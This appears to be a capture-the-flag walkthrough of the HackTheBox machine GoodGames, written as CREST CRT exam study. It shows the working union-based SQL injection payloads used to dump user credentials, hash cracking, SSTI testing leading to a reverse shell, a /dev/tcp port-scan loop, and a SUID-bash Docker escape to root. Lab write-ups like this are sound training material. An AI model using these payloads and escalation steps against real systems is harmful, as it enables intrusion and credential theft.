We covered HackTheBox GoodGames as part of CREST CRT track. We went over SQL Injection, server side template injection and Docker privilege escalation.
Initial Reconnaissance and SQL Injection
I started by identifying that the target machine was running a web server on port 80. I discovered a login page and attempted to bypass authentication using SQL injection. I used Burp Suite to intercept the login request and modified the email field with an SQL injection payload. I successfully logged in as the admin.
To dump the database, I used union-based SQL injection payloads. I found the number of columns using payloads like UNION SELECT 1,2,3
and UNION SELECT 1,2,3,4
. I then found the database name using UNION SELECT 1,2,3,database()
. To find schema names, I used UNION SELECT 1,2,3,group_concat(schema_name) FROM information_schema.schemata
. I found table names with UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema='main'
, where ‘main’ was the database name I discovered earlier. I then found column names by targeting the ‘user’ table: UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name='user'
. Finally, I dumped the data to get user credentials with UNION SELECT 1,2,3,group_concat(id, name, password) FROM user
. I extracted an MD5 hash for the admin user.
I used John the Ripper to crack the hash: john --format=raw-md5 hashfile
. The cracked password was “super administrator”.
Server-Side Template Injection (SSTI)
After logging in as admin with the cracked password, I found an admin dashboard. I identified that the server was Python-based (Flask was hinted, and an Nmap scan confirmed Python). I tested for SSTI in an input field (full name) on the admin profile page using the payload {{7*7}}
. Since it evaluated to 49, SSTI was confirmed.
I then used a Python SSTI payload to confirm the current user ID (which was root). Next, I used another Python SSTI payload to get a reverse shell. I started a Netcat listener using nc -lvp 4545
to catch the shell.
Docker Privilege Escalation
The reverse shell landed me in a Docker container as the root user. I stabilized the shell using script /dev/null -c bash
and stty raw -echo; fg
(followed by Enter, then reset
and export TERM=xterm
). I noticed a .dockerenv
file, indicating I was in a Docker environment. I found that the /home/austos
directory was mounted from the host machine by checking mounts with mount | grep austos
.
To find the host IP, I performed network scanning within Docker using a for loop to ping sweep the local Docker network: for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done
. I then port scanned the identified host IP (Docker host) with another for loop: for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done
. This revealed ports 22 (SSH) and 80 were open.
I SSHed to the Docker Host using ssh austos@172.19.0.1
with the previously cracked password “super administrator”.
For privilege escalation, I had previously copied the /bin/bash
binary from the host to the mounted /home/austos
directory while on the host. From within the Docker container, I changed the ownership of this copied bash
binary to root: chown root:root bash
. Then, I set the SUID bit on the bash
binary: chmod u+s bash
. Back on the Docker host (via the SSH session), I executed the SUID bash
binary from the mounted directory: ./bash -p
(the -p
flag was crucial to preserve permissions and effectively use the SUID bit). This granted me a root shell on the host machine.
Finally, I confirmed root access with id
, navigated to /root
with cd /root
, and found the flag with ls
.
Technical Commands
Here are the technical commands I used:
john --format=raw-md5 hashfile
nc -lvp 4545
script /dev/null -c bash
stty raw -echo; fg
reset
export TERM=xterm
mount | grep austos
for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done
for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done
ssh austos@172.19.0.1
chown root:root bash
chmod u+s bash
./bash -p
id
cd /root
ls